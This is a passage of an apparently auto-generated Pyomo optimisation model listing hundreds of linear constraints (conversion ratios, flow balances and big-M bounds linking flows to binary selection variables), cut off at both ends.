m.c521 = Constraint(expr= - 0.85*m.x446 + m.x470 == 0) m.c522 = Constraint(expr= - 0.85*m.x447 + m.x471 == 0) m.c523 = Constraint(expr= - 0.85*m.x448 + m.x472 == 0) m.c524 = Constraint(expr= - 0.98*m.x449 + m.x473 == 0) m.c525 = Constraint(expr= - 0.98*m.x450 + m.x474 == 0) m.c526 = Constraint(expr= - 0.98*m.x451 + m.x475 == 0) m.c527 = Constraint(expr= - 0.85*m.x476 + m.x488 == 0) m.c528 = Constraint(expr= - 0.85*m.x477 + m.x489 == 0) m.c529 = Constraint(expr= - 0.85*m.x478 + m.x490 == 0) m.c530 = Constraint(expr= - 0.9*m.x479 + m.x491 == 0) m.c531 = Constraint(expr= - 0.9*m.x480 + m.x492 == 0) m.c532 = Constraint(expr= - 0.9*m.x481 + m.x493 == 0) m.c533 = Constraint(expr= - 0.85*m.x482 + m.x494 == 0) m.c534 = Constraint(expr= - 0.85*m.x483 + m.x495 == 0) m.c535 = Constraint(expr= - 0.85*m.x484 + m.x496 == 0) m.c536 = Constraint(expr= - 0.9*m.x485 + m.x497 == 0) m.c537 = Constraint(expr= - 0.9*m.x486 + m.x498 == 0) m.c538 = Constraint(expr= - 0.9*m.x487 + m.x499 == 0) m.c539 = Constraint(expr= - 0.75*m.x512 + m.x524 == 0) m.c540 = Constraint(expr= - 0.75*m.x513 + m.x525 == 0) m.c541 = Constraint(expr= - 0.75*m.x514 + m.x526 == 0) m.c542 = Constraint(expr= - 0.95*m.x515 + m.x527 == 0) m.c543 = Constraint(expr= - 0.95*m.x516 + m.x528 == 0) m.c544 = Constraint(expr= - 0.95*m.x517 + m.x529 == 0) m.c545 = Constraint(expr= - 0.9*m.x518 + m.x530 == 0) m.c546 = Constraint(expr= - 0.9*m.x519 + m.x531 == 0) m.c547 = Constraint(expr= - 0.9*m.x520 + m.x532 == 0) m.c548 = Constraint(expr= - 0.95*m.x521 + m.x533 == 0) m.c549 = Constraint(expr= - 0.95*m.x522 + m.x534 == 0) m.c550 = Constraint(expr= - 0.95*m.x523 + m.x535 == 0) m.c551 = Constraint(expr= - 0.75*m.x512 + m.x536 == 0) m.c552 = Constraint(expr= - 0.75*m.x513 + m.x537 == 0) m.c553 = Constraint(expr= - 0.75*m.x514 + m.x538 == 0) m.c554 = Constraint(expr= - 0.95*m.x515 + m.x539 == 0) m.c555 = Constraint(expr= - 0.95*m.x516 + m.x540 == 0) m.c556 = Constraint(expr= - 0.95*m.x517 + m.x541 == 0) m.c557 = Constraint(expr= - 0.9*m.x518 + m.x542 == 0) m.c558 = Constraint(expr= - 0.9*m.x519 + m.x543 == 0) m.c559 = Constraint(expr= - 0.9*m.x520 + m.x544 == 0) m.c560 = Constraint(expr= - 0.95*m.x521 + m.x545 == 0) m.c561 = Constraint(expr= - 0.95*m.x522 + m.x546 == 0) m.c562 = Constraint(expr= - 0.95*m.x523 + m.x547 == 0) m.c563 = Constraint(expr= - 0.8*m.x500 + m.x560 == 0) m.c564 = Constraint(expr= - 0.8*m.x501 + m.x561 == 0) m.c565 = Constraint(expr= - 0.8*m.x502 + m.x562 == 0) m.c566 = Constraint(expr= - 0.85*m.x503 + m.x563 == 0) m.c567 = Constraint(expr= - 0.85*m.x504 + m.x564 == 0) m.c568 = Constraint(expr= - 0.85*m.x505 + m.x565 == 0) m.c569 = Constraint(expr= - 0.8*m.x506 + m.x566 == 0) m.c570 = Constraint(expr= - 0.8*m.x507 + m.x567 == 0) m.c571 = Constraint(expr= - 0.8*m.x508 + m.x568 == 0) m.c572 = Constraint(expr= - 0.85*m.x509 + m.x569 == 0) m.c573 = Constraint(expr= - 0.85*m.x510 + m.x570 == 0) m.c574 = Constraint(expr= - 0.85*m.x511 + m.x571 == 0) m.c575 = Constraint(expr= - 0.85*m.x548 + m.x572 == 0) m.c576 = Constraint(expr= - 0.85*m.x549 + m.x573 == 0) m.c577 = Constraint(expr= - 0.85*m.x550 + m.x574 == 0) m.c578 = Constraint(expr= - 0.95*m.x551 + m.x575 == 0) m.c579 = Constraint(expr= - 0.95*m.x552 + m.x576 == 0) m.c580 = Constraint(expr= - 0.95*m.x553 + m.x577 == 0) m.c581 = Constraint(expr= - 0.85*m.x554 + m.x578 == 0) m.c582 = Constraint(expr= - 0.85*m.x555 + m.x579 == 0) m.c583 = Constraint(expr= - 0.85*m.x556 + m.x580 == 0) m.c584 = Constraint(expr= - 0.95*m.x557 + m.x581 == 0) m.c585 = Constraint(expr= - 0.95*m.x558 + m.x582 == 0) m.c586 = Constraint(expr= - 0.95*m.x559 + m.x583 == 0) m.c587 = Constraint(expr= - 0.8*m.x584 + m.x596 == 0) m.c588 = Constraint(expr= - 0.8*m.x585 + m.x597 == 0) m.c589 = Constraint(expr= - 0.8*m.x586 + m.x598 == 0) m.c590 = Constraint(expr= - 0.92*m.x587 + m.x599 == 0) m.c591 = Constraint(expr= - 0.92*m.x588 + m.x600 == 0) m.c592 = Constraint(expr= - 0.92*m.x589 + m.x601 == 0) m.c593 = Constraint(expr= - 0.8*m.x590 + m.x602 == 0) m.c594 = Constraint(expr= - 0.8*m.x591 + m.x603 == 0) m.c595 = Constraint(expr= - 0.8*m.x592 + m.x604 == 0) m.c596 = Constraint(expr= - 0.92*m.x593 + m.x605 == 0) m.c597 = Constraint(expr= - 0.92*m.x594 + m.x606 == 0) m.c598 = Constraint(expr= - 0.92*m.x595 + m.x607 == 0) m.c599 = Constraint(expr= m.x5 - m.x260 - m.x263 - m.x266 - m.x269 == 0) m.c600 = Constraint(expr= m.x6 - m.x261 - m.x264 - m.x267 - m.x270 == 0) m.c601 = Constraint(expr= m.x7 - m.x262 - m.x265 - m.x268 - m.x271 == 0) m.c602 = Constraint(expr= m.x8 - m.x272 - m.x275 - m.x278 - m.x281 == 0) m.c603 = Constraint(expr= m.x9 - m.x273 - m.x276 - m.x279 - m.x282 == 0) m.c604 = Constraint(expr= m.x10 - m.x274 - m.x277 - m.x280 - m.x283 == 0) m.c605 = Constraint(expr= m.x20 - m.x284 - m.x287 - m.x290 - m.x293 == 0) m.c606 = Constraint(expr= m.x21 - m.x285 - m.x288 - m.x291 - m.x294 == 0) m.c607 = Constraint(expr= m.x22 - m.x286 - m.x289 - m.x292 - m.x295 == 0) m.c608 = Constraint(expr= m.x32 - m.x296 - m.x299 - m.x302 - m.x305 == 0) m.c609 = Constraint(expr= m.x33 - m.x297 - m.x300 - m.x303 - m.x306 == 0) m.c610 = Constraint(expr= m.x34 - m.x298 - m.x301 - m.x304 - m.x307 == 0) m.c611 = Constraint(expr= m.x41 - m.x308 - m.x311 - m.x314 - m.x317 == 0) m.c612 = Constraint(expr= m.x42 - m.x309 - m.x312 - m.x315 - m.x318 == 0) m.c613 = Constraint(expr= m.x43 - m.x310 - m.x313 - m.x316 - m.x319 == 0) m.c614 = Constraint(expr= m.x50 - m.x332 - m.x335 - m.x338 - m.x341 == 0) m.c615 = Constraint(expr= m.x51 - m.x333 - m.x336 - m.x339 - m.x342 == 0) m.c616 = Constraint(expr= m.x52 - m.x334 - m.x337 - m.x340 - m.x343 == 0) m.c617 = Constraint(expr= m.x47 - m.x320 - m.x323 - m.x326 - m.x329 == 0) m.c618 = Constraint(expr= m.x48 - m.x321 - m.x324 - m.x327 - m.x330 == 0) m.c619 = Constraint(expr= m.x49 - m.x322 - m.x325 - m.x328 - m.x331 == 0) m.c620 = Constraint(expr= m.x68 - m.x344 - m.x347 - m.x350 - m.x353 == 0) m.c621 = Constraint(expr= m.x69 - m.x345 - m.x348 - m.x351 - m.x354 == 0) m.c622 = Constraint(expr= m.x70 - m.x346 - m.x349 - m.x352 - m.x355 == 0) m.c623 = Constraint(expr= m.x71 - m.x356 - m.x359 - m.x362 - m.x365 == 0) m.c624 = Constraint(expr= m.x72 - m.x357 - m.x360 - m.x363 - m.x366 == 0) m.c625 = Constraint(expr= m.x73 - m.x358 - m.x361 - m.x364 - m.x367 == 0) m.c626 = Constraint(expr= m.x92 - m.x380 - m.x383 - m.x386 - m.x389 == 0) m.c627 = Constraint(expr= m.x93 - m.x381 - m.x384 - m.x387 - m.x390 == 0) m.c628 = Constraint(expr= m.x94 - m.x382 - m.x385 - m.x388 - m.x391 == 0) m.c629 = Constraint(expr= m.x89 - m.x368 - m.x371 - m.x374 - m.x377 == 0) m.c630 = Constraint(expr= m.x90 - m.x369 - m.x372 - m.x375 - m.x378 == 0) m.c631 = Constraint(expr= m.x91 - m.x370 - m.x373 - m.x376 - m.x379 == 0) m.c632 = Constraint(expr= m.x260 - 55*m.b704 <= 0) m.c633 = Constraint(expr= m.x261 - 40*m.b705 <= 0) m.c634 = Constraint(expr= m.x262 - 40*m.b706 <= 0) m.c635 = Constraint(expr= m.x263 - 55*m.b707 <= 0) m.c636 = Constraint(expr= m.x264 - 40*m.b708 <= 0) m.c637 = Constraint(expr= m.x265 - 40*m.b709 <= 0) m.c638 = Constraint(expr= m.x266 - 55*m.b710 <= 0) m.c639 = Constraint(expr= m.x267 - 40*m.b711 <= 0) m.c640 = Constraint(expr= m.x268 - 40*m.b712 <= 0) m.c641 = Constraint(expr= m.x269 - 55*m.b713 <= 0) m.c642 = Constraint(expr= m.x270 - 40*m.b714 <= 0) m.c643 = Constraint(expr= m.x271 - 40*m.b715 <= 0) m.c644 = Constraint(expr= m.x272 - 55*m.b716 <= 0) m.c645 = Constraint(expr= m.x273 - 40*m.b717 <= 0) m.c646 = Constraint(expr= m.x274 - 40*m.b718 <= 0) m.c647 = Constraint(expr= m.x275 - 55*m.b719 <= 0) m.c648 = Constraint(expr= m.x276 - 40*m.b720 <= 0) m.c649 = Constraint(expr= m.x277 - 40*m.b721 <= 0) m.c650 = Constraint(expr= m.x278 - 55*m.b722 <= 0) m.c651 = Constraint(expr= m.x279 - 40*m.b723 <= 0) m.c652 = Constraint(expr= m.x280 - 40*m.b724 <= 0) m.c653 = Constraint(expr= m.x281 - 55*m.b725 <= 0) m.c654 = Constraint(expr= m.x282 - 40*m.b726 <= 0) m.c655 = Constraint(expr= m.x283 - 40*m.b727 <= 0) m.c656 = Constraint(expr= m.x284 - 91*m.b716 <= 0) m.c657 = Constraint(expr= m.x285 - 103*m.b717 <= 0) m.c658 = Constraint(expr= m.x286 - 92*m.b718 <= 0) m.c659 = Constraint(expr= m.x287 - 91*m.b719 <= 0) m.c660 = Constraint(expr= m.x288 - 103*m.b720 <= 0) m.c661 = Constraint(expr= m.x289 - 92*m.b721 <= 0) m.c662 = Constraint(expr= m.x290 - 91*m.b722 <= 0) m.c663 = Constraint(expr= m.x291 - 103*m.b723 <= 0) m.c664 = Constraint(expr= m.x292 - 92*m.b724 <= 0) m.c665 = Constraint(expr= m.x293 - 91*m.b725 <= 0) m.c666 = Constraint(expr= m.x294 - 103*m.b726 <= 0) m.c667 = Constraint(expr= m.x295 - 92*m.b727 <= 0) m.c668 = Constraint(expr= m.x296 - 45*m.b728 <= 0) m.c669 = Constraint(expr= m.x297 - 62*m.b729 <= 0) m.c670 = Constraint(expr= m.x298 - 42*m.b730 <= 0) m.c671 = Constraint(expr= m.x299 - 45*m.b731 <= 0) m.c672 = Constraint(expr= m.x300 - 62*m.b732 <= 0) m.c673 = Constraint(expr= m.x301 - 42*m.b733 <= 0) m.c674 = Constraint(expr= m.x302 - 45*m.b734 <= 0) m.c675 = Constraint(expr= m.x303 - 62*m.b735 <= 0) m.c676 = Constraint(expr= m.x304 - 42*m.b736 <= 0) m.c677 = Constraint(expr= m.x305 - 45*m.b737 <= 0) m.c678 = Constraint(expr= m.x306 - 62*m.b738 <= 0) m.c679 = Constraint(expr= m.x307 - 42*m.b739 <= 0) m.c680 = Constraint(expr= m.x308 - 45*m.b740 <= 0) m.c681 = Constraint(expr= m.x309 - 62*m.b741 <= 0) m.c682 = Constraint(expr= m.x310 - 42*m.b742 <= 0) m.c683 = Constraint(expr= m.x311 - 45*m.b743 <= 0) m.c684 = Constraint(expr= m.x312 - 62*m.b744 <= 0) m.c685 = Constraint(expr= m.x313 - 42*m.b745 <= 0) m.c686 = Constraint(expr= m.x314 - 45*m.b746 <= 0) m.c687 = Constraint(expr= m.x315 - 62*m.b747 <= 0) m.c688 = Constraint(expr= m.x316 - 42*m.b748 <= 0) m.c689 = Constraint(expr= m.x317 - 45*m.b749 <= 0) m.c690 = Constraint(expr= m.x318 - 62*m.b750 <= 0) m.c691 = Constraint(expr= m.x319 - 42*m.b751 <= 0) m.c692 = Constraint(expr= m.x332 - 45*m.b752 <= 0) m.c693 = Constraint(expr= m.x333 - 62*m.b753 <= 0) m.c694 = Constraint(expr= m.x334 - 42*m.b754 <= 0) m.c695 = Constraint(expr= m.x335 - 45*m.b755 <= 0) m.c696 = Constraint(expr= m.x336 - 62*m.b756 <= 0) m.c697 = Constraint(expr= m.x337 - 42*m.b757 <= 0) m.c698 = Constraint(expr= m.x338 - 45*m.b758 <= 0) m.c699 = Constraint(expr= m.x339 - 62*m.b759 <= 0) m.c700 = Constraint(expr= m.x340 - 42*m.b760 <= 0) m.c701 = Constraint(expr= m.x341 - 45*m.b761 <= 0) m.c702 = Constraint(expr= m.x342 - 62*m.b762 <= 0) m.c703 = Constraint(expr= m.x343 - 42*m.b763 <= 0) m.c704 = Constraint(expr= m.x320 - 45*m.b764 <= 0) m.c705 = Constraint(expr= m.x321 - 62*m.b765 <= 0) m.c706 = Constraint(expr= m.x322 - 42*m.b766 <= 0) m.c707 = Constraint(expr= m.x323 - 45*m.b767 <= 0) m.c708 = Constraint(expr= m.x324 - 62*m.b768 <= 0) m.c709 = Constraint(expr= m.x325 - 42*m.b769 <= 0) m.c710 = Constraint(expr= m.x326 - 45*m.b770 <= 0) m.c711 = Constraint(expr= m.x327 - 62*m.b771 <= 0) m.c712 = Constraint(expr= m.x328 - 42*m.b772 <= 0) m.c713 = Constraint(expr= m.x329 - 45*m.b773 <= 0) m.c714 = Constraint(expr= m.x330 - 62*m.b774 <= 0) m.c715 = Constraint(expr= m.x331 - 42*m.b775 <= 0) m.c716 = Constraint(expr= m.x344 - 54*m.b764 <= 0) m.c717 = Constraint(expr= m.x345 - 51*m.b765 <= 0) m.c718 = Constraint(expr= m.x346 - 50*m.b766 <= 0) m.c719 = Constraint(expr= m.x347 - 54*m.b767 <= 0) m.c720 = Constraint(expr= m.x348 - 51*m.b768 <= 0) m.c721 = Constraint(expr= m.x349 - 50*m.b769 <= 0) m.c722 = Constraint(expr= m.x350 - 54*m.b770 <= 0) m.c723 = Constraint(expr= m.x351 - 51*m.b771 <= 0) m.c724 = Constraint(expr= m.x352 - 50*m.b772 <= 0) m.c725 = Constraint(expr= m.x353 - 54*m.b773 <= 0) m.c726 = Constraint(expr= m.x354 - 51*m.b774 <= 0) m.c727 = Constraint(expr= m.x355 - 50*m.b775 <= 0) m.c728 = Constraint(expr= m.x356 - 54*m.b776 <= 0) m.c729 = Constraint(expr= m.x357 - 51*m.b777 <= 0) m.c730 = Constraint(expr= m.x358 - 50*m.b778 <= 0) m.c731 = Constraint(expr= m.x359 - 54*m.b779 <= 0) m.c732 = Constraint(expr= m.x360 - 51*m.b780 <= 0) m.c733 = Constraint(expr= m.x361 - 50*m.b781 <= 0) m.c734 = Constraint(expr= m.x362 - 54*m.b782 <= 0) m.c735 = Constraint(expr= m.x363 - 51*m.b783 <= 0) m.c736 = Constraint(expr= m.x364 - 50*m.b784 <= 0) m.c737 = Constraint(expr= m.x365 - 54*m.b785 <= 0) m.c738 = Constraint(expr= m.x366 - 51*m.b786 <= 0) m.c739 = Constraint(expr= m.x367 - 50*m.b787 <= 0) m.c740 = Constraint(expr= m.x380 - 40*m.b776 <= 0) m.c741 = Constraint(expr= m.x381 - 45*m.b777 <= 0) m.c742 = Constraint(expr= m.x382 - 41*m.b778 <= 0) m.c743 = Constraint(expr= m.x383 - 40*m.b779 <= 0) m.c744 = Constraint(expr= m.x384 - 45*m.b780 <= 0) m.c745 = Constraint(expr= m.x385 - 41*m.b781 <= 0) m.c746 = Constraint(expr= m.x386 - 40*m.b782 <= 0) m.c747 = Constraint(expr= m.x387 - 45*m.b783 <= 0) m.c748 = Constraint(expr= m.x388 - 41*m.b784 <= 0) m.c749 = Constraint(expr= m.x389 - 40*m.b785 <= 0) m.c750 = Constraint(expr= m.x390 - 45*m.b786 <= 0) m.c751 = Constraint(expr= m.x391 - 41*m.b787 <= 0) m.c752 = Constraint(expr= m.x368 - 40*m.b788 <= 0) m.c753 = Constraint(expr= m.x369 - 45*m.b789 <= 0) m.c754 = Constraint(expr= m.x370 - 41*m.b790 <= 0) m.c755 = Constraint(expr= m.x371 - 40*m.b791 <= 0) m.c756 = Constraint(expr= m.x372 - 45*m.b792 <= 0) m.c757 = Constraint(expr= m.x373 - 41*m.b793 <= 0) m.c758 = Constraint(expr= m.x374 - 40*m.b794 <= 0) m.c759 = Constraint(expr= m.x375 - 45*m.b795 <= 0) m.c760 = Constraint(expr= m.x376 - 41*m.b796 <= 0) m.c761 = Constraint(expr= m.x377 - 40*m.b797 <= 0) m.c762 = Constraint(expr= m.x378 - 45*m.b798 <= 0) m.c763 = Constraint(expr= m.x379 - 41*m.b799 <= 0) m.c764 = Constraint(expr= m.x260 - 10*m.b704 <= 0) m.c765 = Constraint(expr= m.x261 - 10*m.b705 <= 0) m.c766 = Constraint(expr= m.x262 - 10*m.b706 <= 0) m.c767 = Constraint(expr= m.x263 - 10*m.b707 <= 0) m.c768 = Constraint(expr= m.x264 - 10*m.b708 <= 0) m.c769 = Constraint(expr= m.x265 - 10*m.b709 <= 0) m.c770 = Constraint(expr= m.x266 - 50*m.b710 <= 0) m.c771 = Constraint(expr= m.x267 - 50*m.b711 <= 0) m.c772 = Constraint(expr= m.x268 - 50*m.b712 <= 0) m.c773 = Constraint(expr= m.x269 - 50*m.b713 <= 0) m.c774 = Constraint(expr= m.x270 - 50*m.b714 <= 0) m.c775 = Constraint(expr= m.x271 - 50*m.b715 <= 0) m.c776 = Constraint(expr= m.x272 + m.x284 - 40*m.b716 <= 0) m.c777 = Constraint(expr= m.x273 + m.x285 - 40*m.b717 <= 0) m.c778 = Constraint(expr= m.x274 + m.x286 - 40*m.b718 <= 0) m.c779 = Constraint(expr= m.x275 + m.x287 - 40*m.b719 <= 0) m.c780 = Constraint(expr= m.x276 + m.x288 - 40*m.b720 <= 0) m.c781 = Constraint(expr= m.x277 + m.x289 - 40*m.b721 <= 0) m.c782 = Constraint(expr= m.x278 + m.x290 - 60*m.b722 <= 0) m.c783 = Constraint(expr= m.x279 + m.x291 - 60*m.b723 <= 0) m.c784 = Constraint(expr= m.x280 + m.x292 - 60*m.b724 <= 0) m.c785 = Constraint(expr= m.x281 + m.x293 - 60*m.b725 <= 0) m.c786 = Constraint(expr= m.x282 + m.x294 - 60*m.b726 <= 0) m.c787 = Constraint(expr= m.x283 + m.x295 - 60*m.b727 <= 0) m.c788 = Constraint(expr= m.x296 - 15*m.b728 <= 0) m.c789 = Constraint(expr= m.x297 - 15*m.b729 <= 0) m.c790 = Constraint(expr= m.x298 - 15*m.b730 <= 0) m.c791 = Constraint(expr= m.x299 - 15*m.b731 <= 0) m.c792 = Constraint(expr= m.x300 - 15*m.b732 <= 0) m.c793 = Constraint(expr= m.x301 - 15*m.b733 <= 0) m.c794 = Constraint(expr= m.x302 - 25*m.b734 <= 0) m.c795 = Constraint(expr= m.x303 - 25*m.b735 <= 0) m.c796 = Constraint(expr= m.x304 - 25*m.b736 <= 0) m.c797 = Constraint(expr= m.x305 - 25*m.b737 <= 0) m.c798 = Constraint(expr= m.x306 - 25*m.b738 <= 0) m.c799 = Constraint(expr= m.x307 - 25*m.b739 <= 0) m.c800 = Constraint(expr= m.x308 - 15*m.b740 <= 0) m.c801 = Constraint(expr= m.x309 - 15*m.b741 <= 0) m.c802 = Constraint(expr= m.x310 - 15*m.b742 <= 0) m.c803 = Constraint(expr= m.x311 - 15*m.b743 <= 0) m.c804 = Constraint(expr= m.x312 - 15*m.b744 <= 0) m.c805 = Constraint(expr= m.x313 - 15*m.b745 <= 0) m.c806 = Constraint(expr= m.x314 - 20*m.b746 <= 0) m.c807 = Constraint(expr= m.x315 - 20*m.b747 <= 0) m.c808 = Constraint(expr= m.x316 - 20*m.b748 <= 0) m.c809 = Constraint(expr= m.x317 - 20*m.b749 <= 0) m.c810 = Constraint(expr= m.x318 - 20*m.b750 <= 0) m.c811 = Constraint(expr= m.x319 - 20*m.b751 <= 0) m.c812 = Constraint(expr= m.x332 - 10*m.b752 <= 0) m.c813 = Constraint(expr= m.x333 - 10*m.b753 <= 0) m.c814 = Constraint(expr= m.x334 - 10*m.b754 <= 0) m.c815 = Constraint(expr= m.x335 - 10*m.b755 <= 0) m.c816 = Constraint(expr= m.x336 - 10*m.b756 <= 0) m.c817 = Constraint(expr= m.x337 - 10*m.b757 <= 0) m.c818 = Constraint(expr= m.x338 - 20*m.b758 <= 0) m.c819 = Constraint(expr= m.x339 - 20*m.b759 <= 0) m.c820 = Constraint(expr= m.x340 - 20*m.b760 <= 0) m.c821 = Constraint(expr= m.x341 - 20*m.b761 <= 0) m.c822 = Constraint(expr= m.x342 - 20*m.b762 <= 0) m.c823 = Constraint(expr= m.x343 - 20*m.b763 <= 0) m.c824 = Constraint(expr= m.x320 + m.x344 - 20*m.b764 <= 0) m.c825 = Constraint(expr= m.x321 + m.x345 - 20*m.b765 <= 0) m.c826 = Constraint(expr= m.x322 + m.x346 - 20*m.b766 <= 0) m.c827 = Constraint(expr= m.x323 + m.x347 - 20*m.b767 <= 0) m.c828 = Constraint(expr= m.x324 + m.x348 - 20*m.b768 <= 0) m.c829 = Constraint(expr= m.x325 + m.x349 - 20*m.b769 <= 0) m.c830 = Constraint(expr= m.x326 + m.x350 - 55*m.b770 <= 0) m.c831 = Constraint(expr= m.x327 + m.x351 - 55*m.b771 <= 0) m.c832 = Constraint(expr= m.x328 + m.x352 - 55*m.b772 <= 0) m.c833 = Constraint(expr= m.x329 + m.x353 - 55*m.b773 <= 0) m.c834 = Constraint(expr= m.x330 + m.x354 - 55*m.b774 <= 0) m.c835 = Constraint(expr= m.x331 + m.x355 - 55*m.b775 <= 0) m.c836 = Constraint(expr= m.x356 + m.x380 - 25*m.b776 <= 0) m.c837 = Constraint(expr= m.x357 + m.x381 - 25*m.b777 <= 0) m.c838 = Constraint(expr= m.x358 + m.x382 - 25*m.b778 <= 0) m.c839 = Constraint(expr= m.x359 + m.x383 - 25*m.b779 <= 0) m.c840 = Constraint(expr= m.x360 + m.x384 - 25*m.b780 <= 0) m.c841 = Constraint(expr= m.x361 + m.x385 - 25*m.b781 <= 0) m.c842 = Constraint(expr= m.x362 + m.x386 - 50*m.b782 <= 0) m.c843 = Constraint(expr= m.x363 + m.x387 - 50*m.b783 <= 0) m.c844 = Constraint(expr= m.x364 + m.x388 - 50*m.b784 <= 0) m.c845 = Constraint(expr= m.x365 + m.x389 - 50*m.b785 <= 0) m.c846 = Constraint(expr= m.x366 + m.x390 - 50*m.b786 <= 0) m.c847 = Constraint(expr= m.x367 + m.x391 - 50*m.b787 <= 0) m.c848 = Constraint(expr= m.x368 - 15*m.b788 <= 0) m.c849 = Constraint(expr= m.x369 - 15*m.b789 <= 0) m.c850 = Constraint(expr= m.x370 - 15*m.b790 <= 0) m.c851 = Constraint(expr= m.x371 - 15*m.b791 <= 0) m.c852 = Constraint(expr= m.x372 - 15*m.b792 <= 0) m.c853 = Constraint(expr= m.x373 - 15*m.b793 <= 0) m.c854 = Constraint(expr= m.x374 - 35*m.b794 <= 0) m.c855 = Constraint(expr= m.x375 - 35*m.b795 <= 0) m.c856 = Constraint(expr= m.x376 - 35*m.b796 <= 0) m.c857 = Constraint(expr= m.x377 - 35*m.b797 <= 0) m.c858 = Constraint(expr= m.x378 - 35*m.b798 <= 0) m.c859 = Constraint(expr= m.x379 - 35*m.b799 <= 0) m.c860 = Constraint(expr= m.x236 - m.x608 - m.x611 - m.x614 - m.x617 == 0) m.c861 = Constraint(expr= m.x237 - m.x609 - m.x612 - m.x615 - m.x618 == 0) m.c862 = Constraint(expr= m.x238 - m.x610 - m.x613 - m.x616 - m.x619 == 0) m.c863 = Constraint(expr= m.x239 - m.x620 - m.x623 - m.x626 - m.x629 == 0) m.c864 = Constraint(expr= m.x240 - m.x621 - m.x624 - m.x627 - m.x630 == 0) m.c865 = Constraint(expr= m.x241 - m.x622 - m.x625 - m.x628 - m.x631 == 0) m.c866 = Constraint(expr= m.x242 - m.x632 - m.x635 - m.x638 - m.x641 == 0) m.c867 = Constraint(expr= m.x243 - m.x633 - m.x636 - m.x639 - m.x642 == 0) m.c868 = Constraint(expr= m.x244 - m.x634 - m.x637 - m.x640 - m.x643 == 0) m.c869 = Constraint(expr= m.x245 - m.x644 - m.x647 - m.x650 - m.x653 == 0) m.c870 = Constraint(expr= m.x246 - m.x645 - m.x648 - m.x651 - m.x654 == 0) m.c871 = Constraint(expr= m.x247 - m.x646 - m.x649 - m.x652 - m.x655 == 0) m.c872 = Constraint(expr= m.x248 - m.x656 - m.x659 - m.x662 - m.x665 == 0) m.c873 = Constraint(expr= m.x249 - m.x657 - m.x660 - m.x663 - m.x666 == 0) m.c874 = Constraint(expr= m.x250 - m.x658 - m.x661 - m.x664 - m.x667 == 0) m.c875 = Constraint(expr= m.x251 - m.x668 - m.x671 - m.x674 - m.x677 == 0) m.c876 = Constraint(expr= m.x252 - m.x669 - m.x672 - m.x675 - m.x678 == 0) m.c877 = Constraint(expr= m.x253 - m.x670 - m.x673 - m.x676 - m.x679 == 0) m.c878 = Constraint(expr= m.x254 - m.x680 - m.x683 - m.x686 - m.x689 == 0) m.c879 = Constraint(expr= m.x255 - m.x681 - m.x684 - m.x687 - m.x690 == 0) m.c880 = Constraint(expr= m.x256 - m.x682 - m.x685 - m.x688 - m.x691 == 0) m.c881 = Constraint(expr= m.x257 - m.x692 - m.x695 - m.x698 - m.x701 == 0) m.c882 = Constraint(expr= m.x258 - m.x693 - m.x696 - m.x699 - m.x702 == 0) m.c883 = Constraint(expr= m.x259 - m.x694 - m.x697 - m.x700 - m.x703 == 0) m.c884 = Constraint(expr= m.x608 <= 0) m.c885 = Constraint(expr= m.x609 <= 0) m.c886 = Constraint(expr= m.x610 <= 0) m.c887 = Constraint(expr= m.x611 - 6*m.b803 <= 0) m.c888 = Constraint(expr= m.x612 - 4*m.b804 <= 0) m.c889 = Constraint(expr= m.x613 - 3*m.b805 <= 0) m.c890 = Constraint(expr= m.x614 - 40*m.b806 <= 0) m.c891 = Constraint(expr= m.x615 - 35*m.b807 <= 0) m.c892 = Constraint(expr= m.x616 - 20*m.b808 <= 0) m.c893 = Constraint(expr= m.x617 - 46*m.b809 <= 0) m.c894 = Constraint(expr= m.x618 - 39*m.b810 <= 0) m.c895 = Constraint(expr= m.x619 - 23*m.b811 <= 0) m.c896 = Constraint(expr= m.x620 <= 0) m.c897 = Constraint(expr= m.x621 <= 0) m.c898 = Constraint(expr= m.x622 <= 0) m.c899 = Constraint(expr= m.x623 - 7*m.b815 <= 0) m.c900 = Constraint(expr= m.x624 - 4*m.b816 <= 0) m.c901 = Constraint(expr= m.x625 - 4*m.b817 <= 0) m.c902 = Constraint(expr= m.x626 - 30*m.b818 <= 0) m.c903 = Constraint(expr= m.x627 - 25*m.b819 <= 0) m.c904 = Constraint(expr= m.x628 - 20*m.b820 <= 0) m.c905 = Constraint(expr= m.x629 - 37*m.b821 <= 0) m.c906 = Constraint(expr= m.x630 - 29*m.b822 <= 0) m.c907 = Constraint(expr= m.x631 - 22*m.b823 <= 0) m.c908 = Constraint(expr= m.x632 <= 0) m.c909 = Constraint(expr= m.x633 <= 0) m.c910 = Constraint(expr= m.x634 <= 0) m.c911 = Constraint(expr= m.x635 - 7*m.b827 <= 0) m.c912 = Constraint(expr= m.x636 - 5*m.b828 <= 0) m.c913 = Constraint(expr= m.x637 - 3*m.b829 <= 0) m.c914 = Constraint(expr= m.x638 - 15*m.b830 <= 0) m.c915 = Constraint(expr= m.x639 - 5*m.b831 <= 0) m.c916 = Constraint(expr= m.x640 - 2*m.b832 <= 0) m.c917 = Constraint(expr= m.x641 - 22*m.b833 <= 0) m.c918 = Constraint(expr= m.x642 - 10*m.b834 <= 0) m.c919 = Constraint(expr= m.x643 - 5*m.b835 <= 0) m.c920 = Constraint(expr= m.x644 <= 0) m.c921 = Constraint(expr= m.x645 <= 0) m.c922 = Constraint(expr= m.x646 <= 0) m.c923 = Constraint(expr= m.x647 - 11*m.b839 <= 0) m.c924 = Constraint(expr= m.x648 - 8*m.b840 <= 0) m.c925 = Constraint(expr= m.x649 - 6*m.b841 <= 0) m.c926 = Constraint(expr= m.x650 - 13*m.b842 <= 0) m.c927 = Constraint(expr= m.x651 - 8*m.b843 <= 0) m.c928 = Constraint(expr= m.x652 - 3*m.b844 <= 0) m.c929 = Constraint(expr= m.x653 - 24*m.b845 <= 0) m.c930 = Constraint(expr= m.x654 - 16*m.b846 <= 0) m.c931 = Constraint(expr= m.x655 - 9*m.b847 <= 0) m.c932 = Constraint(expr= m.x656 <= 0) m.c933 = Constraint(expr= m.x657 <= 0) m.c934 = Constraint(expr= m.x658 <= 0) m.c935 = Constraint(expr= m.x659 - 10*m.b851 <= 0) m.c936 = Constraint(expr= m.x660 - 7*m.b852 <= 0) m.c937 = Constraint(expr= m.x661 - 6*m.b853 <= 0) m.c938 = Constraint(expr= m.x662 - 13*m.b854 <= 0) m.c939 = Constraint(expr= m.x663 - 8*m.b855 <= 0) m.c940 = Constraint(expr= m.x664 - 3*m.b856 <= 0) m.c941 = Constraint(expr= m.x665 - 23*m.b857 <= 0) m.c942 = Constraint(expr= m.x666 - 15*m.b858 <= 0) m.c943 = Constraint(expr= m.x667 - 9*m.b859 <= 0) m.c944 